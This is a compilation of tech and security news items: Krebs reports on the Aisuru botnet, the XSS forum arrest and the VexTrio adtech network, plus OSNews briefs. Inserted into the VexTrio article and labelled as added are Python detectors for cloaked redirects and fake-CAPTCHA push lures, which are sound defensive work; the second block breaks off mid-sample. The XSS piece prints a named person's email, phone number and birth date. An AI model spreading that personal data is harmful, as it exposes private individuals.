By late September, Aisuru was publicly flexing DDoS capabilities topping 22 Tbps. Then on October 6, its operators heaved a whopping 29.6 terabits of junk data packets each second at a targeted host. Hardly anyone noticed because it appears to have been a brief test or demonstration of Aisuru’s capabilities: the traffic flood lasted only a few seconds and was pointed at an Internet server that was specifically designed to measure large-scale DDoS attacks.

A measurement of an Oct. 6 DDoS believed to have been launched through multiple botnets operated by the owners of the Aisuru botnet. Image: DDoS Analyzer Community on Telegram.

Aisuru’s overlords aren’t just showing off. Their botnet is being blamed for a series of increasingly massive and disruptive attacks. Although recent assaults from Aisuru have targeted mostly ISPs that serve online gaming communities like Minecraft, those digital sieges often result in widespread collateral Internet disruption.

For the past several weeks, ISPs hosting some of the Internet’s top gaming destinations have been hit with a relentless volley of gargantuan attacks that experts say are well beyond the DDoS mitigation capabilities of most organizations connected to the Internet today.

Steven Ferguson is principal security engineer at Global Secure Layer (GSL), an ISP in Brisbane, Australia. GSL hosts TCPShield, which offers free or low-cost DDoS protection to more than 50,000 Minecraft servers worldwide. Ferguson told KrebsOnSecurity that on October 8, TCPShield was walloped with a blitz from Aisuru that flooded its network with more than 15 terabits of junk data per second.

Ferguson said that after the attack subsided, TCPShield was told by its upstream provider OVH that they were no longer welcome as a customer.

“This was causing serious congestion on their Miami external ports for several weeks, shown publicly via their weather map,” he said, explaining that TCPShield is now solely protected by GSL.

Traces from the recent spate of crippling Aisuru attacks on gaming servers can be still seen at the website blockgametracker.gg, which indexes the uptime and downtime of the top Minecraft hosts. In the following example from a series of data deluges on the evening of September 28, we can see an Aisuru botnet campaign briefly knocked TCPShield offline.

An Aisuru botnet attack on TCPShield (AS64199) on Sept. 28 can be seen in the giant downward spike in the middle of this uptime graphic. Image: grafana.blockgametracker.gg.

Paging through the same uptime graphs for other network operators listed shows almost all of them suffered brief but repeated outages around the same time. Here is the same uptime tracking for Minecraft servers on the network provider Cosmic (AS30456), and it shows multiple large dips that correspond to game server outages caused by Aisuru.

Multiple DDoS attacks from Aisuru can be seen against the Minecraft host Cosmic on Sept. 28. The sharp downward spikes correspond to brief but enormous attacks from Aisuru. Image: grafana.blockgametracker.gg.

BOTNETS R US

Ferguson said he’s been tracking Aisuru for about three months, and recently he noticed the botnet’s composition shifted heavily toward infected systems at ISPs in the United States. Ferguson shared logs from an attack on October 8 that indexed traffic by the total volume sent through each network provider, and the logs showed that 11 of the top 20 traffic sources were U.S. based ISPs.

AT&T customers were by far the biggest U.S. contributors to that attack, followed by botted systems on Charter Communications, Comcast, T-Mobile and Verizon, Ferguson found. He said the volume of data packets per second coming from infected IoT hosts on these ISPs is often so high that it has started to affect the quality of service that ISPs are able to provide to adjacent (non-botted) customers.

“The impact extends beyond victim networks,” Ferguson said. “For instance we have seen 500 gigabits of traffic via Comcast’s network alone. This amount of egress leaving their network, especially being so US-East concentrated, will result in congestion towards other services or content trying to be reached while an attack is ongoing.”

Roland Dobbins is principal engineer at Netscout. Dobbins said Ferguson is spot on, noting that while most ISPs have effective mitigations in place to handle large incoming DDoS attacks, many are far less prepared to manage the inevitable service degradation caused by large numbers of their customers suddenly using some or all available bandwidth to attack others.

“The outbound and cross-bound DDoS attacks can be just as disruptive as the inbound stuff,” Dobbins said. “We’re now in a situation where ISPs are routinely seeing terabit-per-second plus outbound attacks from their networks that can cause operational problems.”

“The crying need for effective and universal outbound DDoS attack suppression is something that is really being highlighted by these recent attacks,” Dobbins continued. “A lot of network operators are learning that lesson now, and there’s going to be a period ahead where there’s some scrambling and potential disruption going on.”

KrebsOnSecurity sought comment from the ISPs named in Ferguson’s report. Charter Communications pointed to a recent blog post on protecting its network, stating that Charter actively monitors for both inbound and outbound attacks, and that it takes proactive action wherever possible.

“In addition to our own extensive network security, we also aim to reduce the risk of customer connected devices contributing to attacks through our Advanced WiFi solution that includes Security Shield, and we make Security Suite available to our Internet customers,” Charter wrote in an emailed response to questions. “With the ever-growing number of devices connecting to networks, we encourage customers to purchase trusted devices with secure development and manufacturing practices, use anti-virus and security tools on their connected devices, and regularly download security patches.”

A spokesperson for Comcast responded, “Currently our network is not experiencing impacts and we are able to handle the traffic.”

9 YEARS OF MIRAI

Aisuru is built on the bones of malicious code that was leaked in 2016 by the original creators of the Mirai IoT botnet. Like Aisuru, Mirai quickly outcompeted all other DDoS botnets in its heyday, and obliterated previous DDoS attack records with a 620 gigabit-per-second siege that sidelined this website for nearly four days in 2016.

The Mirai botmasters likewise used their crime machine to attack mostly Minecraft servers, but with the goal of forcing Minecraft server owners to purchase a DDoS protection service that they controlled. In addition, they rented out slices of the Mirai botnet to paying customers, some of whom used it to mask the sources of other types of cybercrime, such as click fraud.

A depiction of the outages caused by the Mirai botnet attacks against the internet infrastructure firm Dyn on October 21, 2016. Source: Downdetector.com.

Dobbins said Aisuru’s owners also appear to be renting out their botnet as a distributed proxy network that cybercriminal customers anywhere in the world can use to anonymize their malicious traffic and make it appear to be coming from regular residential users in the U.S.

“The people who operate this botnet are also selling (it as) residential proxies,” he said. “And that’s being used to reflect application layer attacks through the proxies on the bots as well.”

The Aisuru botnet harkens back to its predecessor Mirai in another intriguing way. One of its owners is using the Telegram handle “9gigsofram,” which corresponds to the nickname used by the co-owner of a Minecraft server protection service called Proxypipe that was heavily targeted in 2016 by the original Mirai botmasters.

Robert Coelho co-ran Proxypipe back then along with his business partner Erik “9gigsofram” Buckingham, and has spent the past nine years fine-tuning various DDoS mitigation companies that cater to Minecraft server operators and other gaming enthusiasts. Coelho said he has no idea why one of Aisuru’s botmasters chose Buckingham’s nickname, but added that it might say something about how long this person has been involved in the DDoS-for-hire industry.

“The Aisuru attacks on the gaming networks these past seven days have been absolutely huge, and you can see tons of providers going down multiple times a day,” Coelho said.

Coelho said the 15 Tbps attack this week against TCPShield was likely only a portion of the total attack volume hurled by Aisuru at the time, because much of it would have been shoved through networks that simply couldn’t process that volume of traffic all at once. Such outsized attacks, he said, are becoming increasingly difficult and expensive to mitigate.

“It’s definitely at the point now where you need to be spending at least a million dollars a month just to have the network capacity to be able to deal with these attacks,” he said.

RAPID SPREAD

Aisuru has long been rumored to use multiple zero-day vulnerabilities in IoT devices to aid its rapid growth over the past year. XLab, the Chinese security company that was the first to profile Aisuru’s rise in 2024, warned last month that one of the Aisuru botmasters had compromised the firmware distribution website for Totolink, a maker of low-cost routers and other networking gear.

“Multiple sources indicate the group allegedly compromised a router firmware update server in April and distributed malicious scripts to expand the botnet,” XLab wrote on September 15. “The node count is currently reported to be around 300,000.”

A malicious script implanted into a Totolink update server in April 2025. Image: XLab.

Aisuru’s operators received an unexpected boost to their crime machine in August when the U.S. Department of Justice charged the alleged proprietor of Rapper Bot, a DDoS-for-hire botnet that competed directly with Aisuru for control over the global pool of vulnerable IoT systems.

Once Rapper Bot was dismantled, Aisuru’s curators moved quickly to commandeer vulnerable IoT devices that were suddenly set adrift by the government’s takedown, Dobbins said.

“Folks were arrested and Rapper Bot control servers were seized and that’s great, but unfortunately the botnet’s attack assets were then pieced out by the remaining botnets,” he said. “The problem is, even if those infected IoT devices are rebooted and cleaned up, they will still get re-compromised by something else generally within minutes of being plugged back in.”

A screenshot shared by XLab showing the Aisuru botmasters recently celebrating a record-breaking 7.7 Tbps DDoS. The user at the top has adopted the name “Ethan J. Foltz” in a mocking tribute to the alleged Rapper Bot operator who was arrested and charged in August 2025.

BOTMASTERS AT LARGE

XLab’s September blog post cited multiple unnamed sources saying Aisuru is operated by three cybercriminals: “Snow,” who’s responsible for botnet development; “Tom,” tasked with finding new vulnerabilities; and “Forky,” responsible for botnet sales.

KrebsOnSecurity interviewed Forky in our May 2025 story about the record 6.3 Tbps attack from Aisuru. That story identified Forky as a 21-year-old man from Sao Paulo, Brazil who has been extremely active in the DDoS-for-hire scene since at least 2022. The FBI has seized Forky’s DDoS-for-hire domains several times over the years.

Like the original Mirai botmasters, Forky also operates a DDoS mitigation service called Botshield. Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

In our previous interview, Forky acknowledged being involved in the development and marketing of Aisuru, but denied participating in attacks launched by the botnet.

Reached for comment earlier this month, Forky continued to maintain his innocence, claiming that he also is still trying to figure out who the current Aisuru botnet operators are in real life (Forky said the same thing in our May interview).

But after a week of promising juicy details, Forky came up empty-handed once again. Suspecting that Forky was merely being coy, I asked him how someone so connected to the DDoS-for-hire world could still be mystified on this point, and suggested that his inability or unwillingness to blame anyone else for Aisuru would not exactly help his case.

At this, Forky verbally bristled at being pressed for more details, and abruptly terminated our interview.

“I’m not here to be threatened with ignorance because you are stressed,” Forky replied. “They’re blaming me for those new attacks. Pretty much the whole world (is) due to your blog.”

  •  

Mac OS 7.6 and 8 for CHRP releases discovered

For those of us unaware – unlikely on OSNews, but still – for a hot minute in the second half of the ’90s, Apple licensed its Mac OS to OEMs, resulting in officially sanctioned Mac clones from a variety of companies. While intended to grow the Mac’s market share, what ended up happening instead is that the clone makers outcompeted Apple on performance, price, and features, with clones offering several features and capabilities before Apple did – for far lower prices. When Steve Jobs returned to Apple, he killed the clone program almost instantly.

The rather abrupt end of the clone program means there’s a number of variants of the Mac OS that never made their way into the market, most notably variants intended for the Common Hardware Reference Platform, or CHRP, a standard defined by IBM and Apple for PowerPC-based PCs. Thanks to the popular classic Mac YouTuber Mac84, we now have a few of these releases out in the wild.

These CDs contain release candidates for Mac OS 7.6 and Mac OS 8 for CHRP (Common Hardware Reference Platform) systems. They were created to support CHRP computers, but were never released, likely due to Steve Jobs returning to Apple in September 1997 and eliminating the Mac Clone program and any CHRP efforts.

↫ Mac OS 7.6/8 CHRP releases page

Mac84 has an accompanying video diving into more detail about these individual releases by booting and running them in an emulator, so we can get a better idea of what they contain.

While most clone makers only got access to Mac OS 7.x, some of them did, in fact, gain access to Mac OS 8, namely UMAX and Power Computing (the latter of which was acquired by Apple). It’s not the clone nature of these releases that makes them special, but the fact that they’re CHRP releases. This reference platform was a failure in the market, and only a few of IBM’s own machines and some of Motorola’s PowerStack machines properly supported it. Apple, meanwhile, only paid minor lip service to CHRP in its New World Power Macintosh machines.

  •  

Servo ported to Redox

Redox keeps improving every month, and this past one is certainly a banger. The big news this past month is that Servo, the browser engine written in Rust, has been ported to Redox. It’s extremely spartan at the moment, and crashes when a second website is loaded, but it’s a promising start. It also just makes sense to have the premier Rust browser engine running on the premier Rust operating system. Htop and bottom have been ported to Redox for much improved system monitoring, and they’re joined by a port of GoAccess.

The version of Rust has been updated, which fixed some issues, and keyboard layout configuration has been greatly improved. Instead of a few hardcoded layouts, they can now be configured dynamically for users of PS/2 keyboards, with USB keyboards receiving this functionality soon as well. There’s more, of course, as well as the usual slew of low-level changes and improvements to drivers, the kernel, relibc, and more.

  •  

MacOS 26’s new icons are a step backwards

On the new MacOS 26 (Tahoe), Apple has mandated that all application icons fit into their prescribed squircle. No longer can icons have distinct shapes, nor even any fun frame-breaking accessories. Should an icon be so foolish as to try to have a bit of personality, it will find itself stuffed into a dingy gray icon jail.

↫ Paul Kafasis

The downgraded icons listed in this article are just… sad. While there’s no accounting for tastes, Apple’s new glassy icons are just plain bad, void of any whimsy, and lacking in artistry, especially considering where Apple came from, back when it made beautifully crafted icons that set the bar for the entire industry.

Almost seems like a metaphor for tech in general.

  •  

Who Got Arrested in the Raid on the XSS Crime Forum?

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.

An unnamed 38-year-old man was arrested in Kiev last month on suspicion of administering the cybercrime forum XSS. Image: ssu.gov.ua.

Europol did not name the accused, but published partially obscured photos of him from the raid on his residence in Kiev. The police agency said the suspect acted as a trusted third party — arbitrating disputes between criminals — and guaranteeing the security of transactions on XSS. A statement from Ukraine’s SBU security service said XSS counted among its members many cybercriminals from various ransomware groups, including REvil, LockBit, Conti, and Qilin.

Since the Europol announcement, the XSS forum resurfaced at a new address on the deep web (reachable only via the anonymity network Tor). But from reviewing the recent posts, there appears to be little consensus among longtime members about the identity of the now-detained XSS administrator.

The most frequent comment regarding the arrest was a message of solidarity and support for Toha, the handle chosen by the longtime administrator of XSS and several other major Russian forums. Toha’s accounts on other forums have been silent since the raid.

Europol said the suspect has enjoyed a nearly 20-year career in cybercrime, which roughly lines up with Toha’s history. In 2005, Toha was a founding member of the Russian-speaking forum Hack-All. That is, until it got massively hacked a few months after its debut. In 2006, Toha rebranded the forum to exploit[.]in, which would go on to draw tens of thousands of members, including an eventual Who’s-Who of wanted cybercriminals.

Toha announced in 2018 that he was selling the Exploit forum, prompting rampant speculation on the forums that the buyer was secretly a Russian or Ukrainian government entity or front person. However, those suspicions were unsupported by evidence, and Toha vehemently denied the forum had been given over to authorities.

One of the oldest Russian-language cybercrime forums was DaMaGeLaB, which operated from 2004 to 2017, when its administrator “Ar3s” was arrested. In 2018, a partial backup of the DaMaGeLaB forum was reincarnated as xss[.]is, with Toha as its stated administrator.

CROSS-SITE GRIFTING

Clues about Toha’s early presence on the Internet — from ~2004 to 2010 — are available in the archives of Intel 471, a cyber intelligence firm that tracks forum activity. Intel 471 shows Toha used the same email address across multiple forum accounts, including at Exploit, Antichat, Carder[.]su and inattack[.]ru.

DomainTools.com finds Toha’s email address — toschka2003@yandex.ru — was used to register at least a dozen domain names — most of them from the mid- to late 2000s. Apart from exploit[.]in and a domain called ixyq[.]com, the other domains registered to that email address end in .ua, the top-level domain for Ukraine (e.g. deleted.org[.]ua, lj.com[.]ua, and blogspot.org[.]ua).

A 2008 snapshot of a domain registered to toschka2003@yandex.ru and to Anton Medvedovsky in Kiev. Note the message at the bottom left, “Protected by Exploit,in.” Image: archive.org.

Nearly all of the domains registered to toschka2003@yandex.ru contain the name Anton Medvedovskiy in the registration records, except for the aforementioned ixyq[.]com, which is registered to the name Yuriy Avdeev in Moscow.

This Avdeev surname came up in a lengthy conversation with Lockbitsupp, the leader of the rapacious and destructive ransomware affiliate group Lockbit. The conversation took place in February 2024, when Lockbitsupp asked for help identifying Toha’s real-life identity.

In early 2024, the leader of the Lockbit ransomware group — Lockbitsupp — asked for help investigating the identity of the XSS administrator Toha, which he claimed was a Russian man named Anton Avdeev.

Lockbitsupp didn’t share why he wanted Toha’s details, but he maintained that Toha’s real name was Anton Avdeev. I declined to help Lockbitsupp in whatever revenge he was planning on Toha, but his question made me curious to look deeper.

It appears Lockbitsupp’s query was based on a now-deleted Twitter post from 2022, when a user by the name “3xp0rt” asserted that Toha was a Russian man named Anton Viktorovich Avdeev, born October 27, 1983.

Searching the web for Toha’s email address toschka2003@yandex.ru reveals a 2010 sales thread on the forum bmwclub.ru where a user named Honeypo was selling a 2007 BMW X5. The ad listed the contact person as Anton Avdeev and gave the contact phone number 9588693.

A search on the phone number 9588693 in the breach tracking service Constella Intelligence finds plenty of official Russian government records with this number, date of birth and the name Anton Viktorovich Avdeev. For example, hacked Russian government records show this person has a Russian tax ID and SIN (Social Security number), and that they were flagged for traffic violations on several occasions by Moscow police; in 2004, 2006, 2009, and 2014.

Astute readers may have noticed by now that the ages of Mr. Avdeev (41) and the XSS admin arrested this month (38) are a bit off. This would seem to suggest that the person arrested is someone other than Mr. Avdeev, who did not respond to requests for comment.

A FLY ON THE WALL

For further insight on this question, KrebsOnSecurity sought comments from Sergeii Vovnenko, a former cybercriminal from Ukraine who now works at the security startup paranoidlab.com. I reached out to Vovnenko because for several years beginning around 2010 he was the owner and operator of thesecure[.]biz, an encrypted “Jabber” instant messaging server that Europol said was operated by the suspect arrested in Kiev. Thesecure[.]biz grew quite popular among many of the top Russian-speaking cybercriminals because it scrupulously kept few records of its users’ activity, and its administrator was always a trusted member of the community.

The reason I know this historic tidbit is that in 2013, Vovnenko — using the hacker nicknames “Fly,” and “Flycracker” — hatched a plan to have a gram of heroin purchased off of the Silk Road darknet market and shipped to our home in Northern Virginia. The scheme was to spoof a call from one of our neighbors to the local police, saying this guy Krebs down the street was a druggie who was having narcotics delivered to his home.

I happened to be lurking on Flycracker’s private cybercrime forum when his heroin-framing plan was carried out, and called the police myself before the smack eventually arrived in the U.S. Mail. Vovnenko was later arrested for unrelated cybercrime activities, extradited to the United States, convicted, and deported after a 16-month stay in the U.S. prison system [on several occasions, he has expressed heartfelt apologies for the incident, and we have since buried the hatchet].

Vovnenko said he purchased a device for cloning credit cards from Toha in 2009, and that Toha shipped the item from Russia. Vovnenko explained that he (Flycracker) was the owner and operator of thesecure[.]biz from 2010 until his arrest in 2014.

Vovnenko believes thesecure[.]biz was stolen while he was in jail, either by Toha and/or an XSS administrator who went by the nicknames N0klos and Sonic.

“When I was in jail, [the] admin of xss.is stole that domain, or probably N0klos bought XSS from Toha or vice versa,” Vovnenko said of the Jabber domain. “Nobody from [the forums] spoke with me after my jailtime, so I can only guess what really happened.”

N0klos was the owner and administrator of an early Russian-language cybercrime forum known as Darklife[.]ws. However, N0klos also appears to be a lifelong Russian resident, and in any case seems to have vanished from Russian cybercrime forums several years ago.

Asked whether he believes Toha was the XSS administrator who was arrested this month in Ukraine, Vovnenko maintained that Toha is Russian, and that “the French cops took the wrong guy.”

WHO IS TOHA?

So who did the Ukrainian police arrest in response to the investigation by the French authorities? It seems plausible that the BMW ad invoking Toha’s email address and the name and phone number of a Russian citizen was simply misdirection on Toha’s part — intended to confuse and throw off investigators. Perhaps this even explains the Avdeev surname surfacing in the registration records from one of Toha’s domains.

But sometimes the simplest answer is the correct one. “Toha” is a common Slavic nickname for someone with the first name “Anton,” and that matches the name in the registration records for more than a dozen domains tied to Toha’s toschka2003@yandex.ru email address: Anton Medvedovskiy.

Constella Intelligence finds there is an Anton Gannadievich Medvedovskiy living in Kiev who will be 38 years old in December. This individual owns the email address itsmail@i.ua, as well as an Airbnb account featuring a profile photo of a man with roughly the same hairline as the suspect in the blurred photos released by the Ukrainian police. Mr. Medvedovskiy did not respond to a request for comment.

My take on the takedown is that the Ukrainian authorities likely arrested Medvedovskiy. Toha shared on DaMaGeLab in 2005 that he had recently finished the 11th grade and was studying at a university — a time when Medvedovskiy would have been around 18 years old. On Dec. 11, 2006, fellow Exploit members wished Toha a happy birthday. Records exposed in a 2022 hack at the Ukrainian public services portal diia.gov.ua show that Mr. Medvedovskiy’s birthday is Dec. 11, 1987.

The law enforcement action and resulting confusion about the identity of the detained has thrown the Russian cybercrime forum scene into disarray in recent weeks, with lengthy and heated arguments about XSS’s future spooling out across the forums.

XSS relaunched on a new Tor address shortly after the authorities plastered their seizure notice on the forum’s homepage, but all of the trusted moderators from the old forum were dismissed without explanation. Existing members saw their forum account balances drop to zero, and were asked to plunk down a deposit to register at the new forum. The new XSS “admin” said they were in contact with the previous owners and that the changes were to help rebuild security and trust within the community.

However, the new admin’s assurances appear to have done little to assuage the worst fears of the forum’s erstwhile members, most of whom seem to be keeping their distance from the relaunched site for now.

Indeed, if there is one common understanding amid all of these discussions about the seizure of XSS, it is that Ukrainian and French authorities now have several years worth of private messages between XSS forum users, as well as contact rosters and other user data linked to the seized Jabber server.

“The myth of the ‘trusted person’ is shattered,” the user “GordonBellford” cautioned on Aug. 3 in an Exploit forum thread about the XSS admin arrest. “The forum is run by strangers. They got everything. Two years of Jabber server logs. Full backup and forum database.”

GordonBellford continued:

And the scariest thing is: this data array is not just an archive. It is material for analysis that has ALREADY BEEN DONE. With the help of modern tools, they see everything:

Graphs of your contacts and activity.
Relationships between nicknames, emails, password hashes and Jabber ID.
Timestamps, IP addresses and digital fingerprints.
Your unique writing style, phraseology, punctuation, consistency of grammatical errors, and even typical typos that will link your accounts on different platforms.

They are not looking for a needle in a haystack. They simply sifted the haystack through the AI sieve and got ready-made dossiers.


Inside a Dark Adtech Empire Fed by Fake CAPTCHAs

Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.

Image: Infoblox.

In November 2024, researchers at the security firm Qurium published an investigation into “Doppelganger,” a disinformation network that promotes pro-Russian narratives and infiltrates Europe’s media landscape by pushing fake news through a network of cloned websites.

Doppelganger campaigns use specialized links that bounce the visitor’s browser through a long series of domains before the fake news content is served. Qurium found Doppelganger relies on a sophisticated “domain cloaking” service, a technology that allows websites to present different content to search engines compared to what regular visitors see. The use of cloaking services helps the disinformation sites remain online longer than they otherwise would, while ensuring that only the targeted audience gets to view the intended content.

Qurium discovered that Doppelganger’s cloaking service also promoted online dating sites, and shared much of the same infrastructure with VexTrio, which is thought to be the oldest malicious traffic distribution system (TDS) in existence. While TDSs are commonly used by legitimate advertising networks to manage traffic from disparate sources and to track who or what is behind each click, VexTrio’s TDS largely manages web traffic from victims of phishing, malware, and social engineering scams.
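The two checks a practitioner would run against a link suspected of going through a cloaking service or a TDS are to record every hop in the redirect chain and to compare what an ordinary browser receives with what a search-engine crawler receives from the same URL. The following is an added example, not code from the article or from Qurium or Infoblox. The User-Agent strings, the sample pages and the sample URL are constructed for the example; the heuristics (differing titles, a large size difference, a meta-refresh or JavaScript redirect served only to browsers) are assumptions about what cloaking typically looks like, not a description of VexTrio's own code.

```python
"""Two checks for a suspected cloaked link: record the server-side redirect
chain, then compare what an ordinary browser receives with what a crawler
receives. Standard library only; the sample data below is constructed."""
import html
import re
import sys
import urllib.request

# Constructed User-Agent strings (assumptions, not taken from the article).
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.I)
JS_LOCATION = re.compile(
    r'(?:window\.|document\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']'
    r'|location\.replace\(\s*["\']([^"\']+)["\']', re.I)


class ChainRecorder(urllib.request.HTTPRedirectHandler):
    """Follows 3xx redirects like the default handler but keeps every hop."""

    def __init__(self):
        self.hops = []  # list of (status_code, next_url)

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        self.hops.append((code, newurl))
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch(url, user_agent, timeout=15, max_bytes=512_000):
    """Return (server_hops, final_url, body) for one User-Agent (needs network)."""
    recorder = ChainRecorder()
    opener = urllib.request.build_opener(recorder)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with opener.open(req, timeout=timeout) as resp:
        body = resp.read(max_bytes).decode("utf-8", "replace")
        return recorder.hops, resp.geturl(), body


def client_side_hops(body):
    """Redirects urllib/curl never follow: meta refresh and plain JS location changes."""
    hops = [m.group(1) for m in META_REFRESH.finditer(body)]
    hops += [m.group(1) or m.group(2) for m in JS_LOCATION.finditer(body)]
    return hops


def page_title(body):
    m = re.search(r"<title[^>]*>(.*?)</title>", body, re.I | re.S)
    return html.unescape(m.group(1)).strip() if m else ""


def cloaking_signals(browser_view, crawler_view):
    """Each view is (final_url, body). Every True value is one reason to suspect cloaking."""
    b_url, b_body = browser_view
    c_url, c_body = crawler_view
    sizes = sorted([max(len(b_body), 1), max(len(c_body), 1)])
    return {
        "different_final_url": b_url.rstrip("/") != c_url.rstrip("/"),
        "different_title": page_title(b_body) != page_title(c_body),
        "size_ratio_over_3x": sizes[1] / sizes[0] > 3,
        "browser_only_client_redirect": bool(client_side_hops(b_body)) and not client_side_hops(c_body),
    }


def is_probably_cloaked(signals):
    """Two or more independent signals; any one alone is common on legitimate sites."""
    return sum(signals.values()) >= 2


# Constructed sample pages for offline use: a bounce page served to browsers
# and an innocuous article served to the crawler from the same URL.
SAMPLE_URL = "https://news-clone.example.invalid/story"
SAMPLE_BROWSER_BODY = """<html><head><title>Redirecting</title>
<meta http-equiv="refresh" content="0;url=https://dating.example.invalid/?aff=123">
</head><body><script>setTimeout(function(){location.replace("https://dating.example.invalid/?aff=123")},500)</script></body></html>"""
SAMPLE_CRAWLER_BODY = ("<html><head><title>Local council approves new budget</title></head><body>"
                       + "<p>Council members voted on Tuesday to approve the budget.</p>" * 20
                       + "</body></html>")

if __name__ == "__main__":
    if len(sys.argv) > 1:  # live mode: python3 cloak_check.py https://suspect.example/path
        views = {}
        for name, ua in (("browser", BROWSER_UA), ("crawler", CRAWLER_UA)):
            hops, final, body = fetch(sys.argv[1], ua)
            views[name] = (final, body)
            print(name, "server hops:", hops, "client hops:", client_side_hops(body))
        print(cloaking_signals(views["browser"], views["crawler"]))
    else:  # offline demonstration on the constructed samples
        print(cloaking_signals((SAMPLE_URL, SAMPLE_BROWSER_BODY), (SAMPLE_URL, SAMPLE_CRAWLER_BODY)))
```

Run it without arguments to see the verdict on the constructed pair, or with a URL to fetch the real thing twice. Two caveats worth keeping in mind: a cloaking service may key on source IP or on referrer rather than on User-Agent, so a clean result from a desk IP proves nothing, and the client-side hop list only catches the simple redirect forms; heavily obfuscated smartlink JavaScript has to be run in an instrumented browser to see where it goes.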

BREAKING BAD

Digging deeper, Qurium noticed Doppelganger’s cloaking service used an Internet provider in Switzerland as the first entry point in a chain of domain redirections. They also noticed the same infrastructure hosted a pair of co-branded affiliate marketing services that were driving traffic to sketchy adult dating sites: LosPollos[.]com and TacoLoco[.]co.

The LosPollos ad network incorporates many elements and references from the hit series “Breaking Bad,” mirroring the fictional “Los Pollos Hermanos” restaurant chain that served as a money laundering operation for a violent methamphetamine cartel.

The LosPollos advertising network invokes characters and themes from the hit show Breaking Bad. The logo for LosPollos (upper left) is the image of Gustavo Fring, the fictional chicken restaurant chain owner in the show.

Affiliates who sign up with LosPollos are given JavaScript-heavy “smartlinks” that drive traffic into the VexTrio TDS, which in turn distributes the traffic among a variety of advertising partners, including dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams and malware download sites.

LosPollos affiliates typically stitch these smart links into WordPress websites that have been hacked via known vulnerabilities, and those affiliates will earn a small commission each time an Internet user referred by any of their hacked sites falls for one of these lures.

The Los Pollos advertising network promoting itself on LinkedIn.

According to Qurium, TacoLoco is a traffic monetization network that uses deceptive tactics to trick Internet users into enabling “push notifications,” a cross-platform browser standard that allows websites to show pop-up messages which appear outside of the browser. For example, on Microsoft Windows systems these notifications typically show up in the bottom right corner of the screen — just above the system clock.

In the case of VexTrio and TacoLoco, the notification approval requests themselves are deceptive — disguised as “CAPTCHA” challenges designed to distinguish automated bot traffic from real visitors. For years, VexTrio and its partners have successfully tricked countless users into enabling these site notifications, which are then used to continuously pepper the victim’s device with a variety of phony virus alerts and misleading pop-up messages.

Examples of VexTrio landing pages that lead users to accept push notifications on their device.
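The lure described above has two necessary ingredients: page code that can raise the browser's permission prompt (the Notification API or a push subscription through a service worker) and visible text that coaches the visitor into pressing Allow under the guise of a bot check. The following is an added example of triaging a landing page for that combination; it is not code from the article, from Infoblox or from Qurium. The phrase list, the CAPTCHA-provider list and the two sample pages are constructed for the example and should be extended from real samples before relying on them.

```python
"""Heuristic triage of a landing page for the fake-CAPTCHA push lure: flag a
page only when permission-requesting code and 'press Allow' coaching appear
together and no genuine CAPTCHA widget explains the wording. Stdlib only."""
import re

# Calls that can raise the permission prompt or register for push delivery.
PERMISSION_API = re.compile(
    r"Notification\.requestPermission|pushManager\.subscribe|serviceWorker\.register", re.I)

# Constructed phrase list typical of the lure; extend from real samples.
LURE_PHRASES = [
    r'\bnot\s+a\s+robot\b',
    r'\b(?:press|click|tap)\s+(?:the\s+)?["\']?allow["\']?',
    r'\ballow\b[^.<]{0,40}\b(?:verify|confirm|continue|watch|download)',
    r'\bconfirm\s+(?:that\s+)?you\s+are\s+(?:a\s+)?human\b',
]
LURE_RE = re.compile("|".join(LURE_PHRASES), re.I)

# Script URLs of real CAPTCHA providers, whose widgets legitimately say "not a robot".
REAL_CAPTCHA = re.compile(
    r"google\.com/recaptcha|hcaptcha\.com/1/api\.js|challenges\.cloudflare\.com/turnstile", re.I)


def strip_tags(body):
    """Rough visible-text extraction: drop scripts and styles, then all tags."""
    body = re.sub(r"<(script|style)[^>]*>.*?</\1>", " ", body, flags=re.I | re.S)
    return re.sub(r"<[^>]+>", " ", body)


def push_lure_report(body):
    """Return the evidence found plus a verdict: push-lure, review or clean."""
    text = strip_tags(body)
    api_calls = sorted(set(PERMISSION_API.findall(body)))
    phrases = [m.group(0) for m in LURE_RE.finditer(text)]
    genuine = bool(REAL_CAPTCHA.search(body))
    if api_calls and phrases and not genuine:
        verdict = "push-lure"
    elif api_calls and phrases:
        verdict = "review"  # permission code sitting next to a real CAPTCHA widget
    else:
        verdict = "clean"   # news sites asking for notifications without a ruse land here
    return {"permission_api_calls": api_calls, "lure_phrases": phrases,
            "real_captcha_provider": genuine, "verdict": verdict}


# Constructed samples: a lure page and a page using a real reCAPTCHA widget.
SAMPLE_LURE_PAGE = """<html><head><title>Verify</title></head><body>
<div class="captcha"><img src="robot.png"> Click Allow to confirm that you are not a robot</div>
<script>
navigator.serviceWorker.register('/sw.js');
Notification.requestPermission().then(function(p){
  if (p === 'granted') { location.href = 'https://win.example.invalid/?aff=9'; }
});
</script></body></html>"""
SAMPLE_RECAPTCHA_PAGE = """<html><head><title>Sign in</title>
<script src="https://www.google.com/recaptcha/api.js" async defer></script></head>
<body><form><div class="g-recaptcha" data-sitekey="x"></div><p>I'm not a robot</p>
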